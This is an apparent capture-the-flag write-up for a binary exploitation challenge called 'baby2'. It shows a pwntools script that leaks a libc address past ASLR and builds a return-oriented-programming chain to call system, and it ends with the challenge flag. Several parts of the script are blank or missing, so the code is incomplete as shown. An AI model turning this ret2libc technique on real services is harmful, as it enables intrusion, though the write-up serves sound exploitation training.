Categories: pwn baby pwned!
Description: When Swordfish came out, these were considered some state of the art techniques. Let's see if you have what it takes.
File: baby2,
This time the binary does not contains a win
function. Assuming ASLR is enabled on the remote target, I first leaked a
known address and calculated the offset.
from pwn import *
isRemote = args['REMOTE']
binary = './baby2'
localElf = '/usr/lib/'
remoteElf = './'
context.binary = binary
elf = ELF(binary)
libc = ELF(remoteElf if isRemote else localElf)
p = remote('', 10002) if isRemote else elf.process()
p.recvuntil('input: ')
r = ROP(elf)
p.sendline('A' * 24 + str(r))
leak = p.recvuntil('input: ')
leaked_gets = u64(leak[:6].ljust(8, '\x00'))
libc.address = leaked_gets - libc.sym['gets']
Now I could simply call system
with the correct parameter:
r = ROP(libc)
r.raw(r.find_gadget(['ret']).address) # align the stack
p.sendline('A' * 24 + str(r))
The flag was sctf{An0tH3r_S1lLy_L1Ttl3_R0P}